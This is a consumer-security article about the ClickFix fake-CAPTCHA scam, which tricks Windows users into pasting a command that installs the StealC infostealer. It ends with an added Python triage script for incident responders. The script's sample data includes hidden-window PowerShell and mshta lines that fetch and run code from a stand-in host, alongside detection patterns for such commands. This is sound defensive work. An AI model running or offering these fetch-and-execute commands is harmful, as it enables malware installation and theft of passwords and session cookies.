A warning from the Identity Theft Resource Center is drawing attention to a scam that takes one of the internet's most ordinary security tools and turns it into a trap. The scam uses fake CAPTCHA prompts to trick users into installing malware on their own computers, without ever clicking a download button or opening a suspicious file.
According to a report by Fox News, the attack works by presenting users with what looks like a normal CAPTCHA verification screen. Instead of asking them to click images of traffic lights or fire hydrants, the fake prompt instructs them to press Windows + R on their keyboard, then Ctrl + V, and then Enter. Those three steps open the Windows Run dialog, paste a command that the page's own script has already placed on the clipboard, and execute it. The browser never downloads anything; the user's own keystrokes launch the command, and the small Run box closes the moment Enter is pressed, so most people never realize what has happened. Security researchers commonly refer to this technique as ClickFix.
Security researchers say this scam typically delivers StealC, an information-stealing malware family. Once launched it stays in the background and harvests saved passwords, browser login sessions (session cookies), autofill data, and cryptocurrency wallet details, then sends them to the attacker. Because it produces no visible symptoms, many users have no idea their machine is compromised until they notice unauthorized access to their accounts.
The scam is effective for a specific reason. People have seen CAPTCHA prompts on banking sites, retail pages, and login screens for years. That familiarity creates trust, and trust lowers the kind of caution that would normally cause someone to stop and question unusual instructions. There is no suspicious download window. There is no pop-up warning. Because the browser never writes a file to disk, download warnings and file-reputation checks never get a chance to fire, and the pasted command runs with the full privileges of the logged-in user. The page simply gives the user a set of steps, and the user follows them.
The Identity Theft Resource Center and cybersecurity researchers are clear on what a real CAPTCHA will and will not do. A legitimate verification check will never ask a user to open the Run dialog or a command window, press keyboard shortcuts such as Windows + R, or paste and run any kind of command. If a CAPTCHA prompt asks for any of those things, the correct response is to close the browser tab immediately and not paste the clipboard contents anywhere.
The scam is part of a broader pattern of attacks that target human behavior rather than software vulnerabilities. A user can avoid suspicious links, ignore phishing emails, and still be compromised in a single moment because a familiar-looking prompt asked them to do something that felt routine. That behavioral targeting is what makes this category of attack particularly difficult to defend against with technical tools alone.
The warning comes as cybersecurity threats continue to grow in sophistication. Older scams relied on users clicking bad links or opening infected attachments. This approach requires none of that. The user never downloads anything. The user never visits an obviously suspicious site. The user simply follows instructions on a page that looks like hundreds of other pages they have trusted before.
Anyone who believes they may have already followed these steps on a suspicious site should treat the machine as compromised: run a full malware scan immediately, check the Run dialog's history (the RunMRU list) for the pasted command, and then, from a device known to be clean, change passwords for important accounts and sign out of all active sessions, since the stealer takes browser session cookies as well as passwords and a stolen cookie can remain valid after a password change on some services. Finally, review banking and email accounts for unauthorized activity.
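The Windows + R, Ctrl + V, Enter sequence described above leaves two artifacts a responder can check: the Run dialog keeps a history of what was typed or pasted into it (the RunMRU registry key), and whatever was pasted shows up in process telemetry as a script interpreter or download utility spawned directly by explorer.exe. The Python below is an added worked example for that triage; it is not code from the article, from the ITRC, or from any StealC analysis. The RunMRU values, the process records and the example.invalid URLs are constructed samples so the script runs offline; on a real machine the key would come from a registry export and the events from Sysmon or an EDR.

```python
"""Triage helpers for a suspected fake-CAPTCHA (ClickFix-style) compromise.

Added example, not the article's or ITRC's code. Two artifacts are checked:
  1. HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
     where Windows stores each Run-dialog entry as a value ("a", "b", ...)
     terminated by "\\1", and MRUList lists value names most-recent-first;
  2. process-creation records (Sysmon Event ID 1 field names), where a
     Run-dialog launch appears as an interpreter whose parent is explorer.exe.
All sample data below is constructed; nothing here touches a live system.
"""
import re
from typing import Dict, List, Tuple

# Interpreters and download utilities a pasted one-liner typically invokes.
INTERPRETER_IMAGES = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "bitsadmin.exe", "certutil.exe", "msiexec.exe",
}

# Fetch-and-execute indicators inside the command line itself.
INDICATORS = {
    "remote URL": re.compile(r"https?://", re.I),
    "in-memory execution": re.compile(r"\b(iex|invoke-expression|downloadstring)\b", re.I),
    "web request": re.compile(r"\b(iwr|invoke-webrequest|curl|wget|start-bitstransfer)\b", re.I),
    "encoded command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}


def score_command(cmd: str) -> List[str]:
    """Names of the fetch-and-execute indicators present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def launched_program(cmd: str) -> str:
    """Lower-case basename of the program a Run-dialog line starts, e.g. 'mshta.exe'."""
    cmd = cmd.strip()
    if cmd.startswith('"'):                      # quoted path, may contain spaces
        end = cmd.find('"', 1)
        first = cmd[1:end] if end > 0 else cmd[1:]
    else:
        first = cmd.split(None, 1)[0] if cmd else ""
    name = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name + ".exe" if name and "." not in name else name


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Run-dialog history, most recent first, with the trailing '\\1' removed."""
    order = values.get("MRUList", "")
    names = [n for n in order if n in values]
    names += sorted(n for n in values if n != "MRUList" and n not in order)
    return [values[n][:-2] if values[n].endswith("\\1") else values[n] for n in names]


def triage_runmru(values: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Entries that launch an interpreter/downloader AND carry a fetch-and-execute indicator."""
    hits = []
    for cmd in parse_runmru(values):
        prog, reasons = launched_program(cmd), score_command(cmd)
        if prog in INTERPRETER_IMAGES and reasons:
            hits.append((cmd, ["launches " + prog] + reasons))
    return hits


def flag_process_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Interpreters spawned directly by explorer.exe with fetch-and-execute indicators."""
    hits = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        reasons = score_command(ev["CommandLine"])
        if parent == "explorer.exe" and image in INTERPRETER_IMAGES and reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


# Constructed RunMRU export: two benign entries and two ClickFix-style pastes.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt)"\\1',
    "d": "mshta https://example.invalid/captcha.html\\1",
}

# Constructed process-creation records (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt)"'},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",   # developer shell, benign parent
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for cmd, why in triage_runmru(SAMPLE_RUNMRU):
        print("RunMRU  :", cmd, "->", ", ".join(why))
    for cmd, why in flag_process_events(SAMPLE_EVENTS):
        print("Process :", cmd, "->", ", ".join(why))
```

The two checks are deliberately conjunctive: a bare `cmd` or `powershell` in the Run history is routine for administrators, and a URL on its own is just someone opening a website from Run, but an interpreter combined with a remote URL, an encoded or hidden-window flag, or an `iex`/`iwr` fetch is the exact shape of the pasted command this scam relies on. The explorer.exe parent is what distinguishes a Run-dialog launch from the same interpreter being started by a terminal, a script, or a scheduled task.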
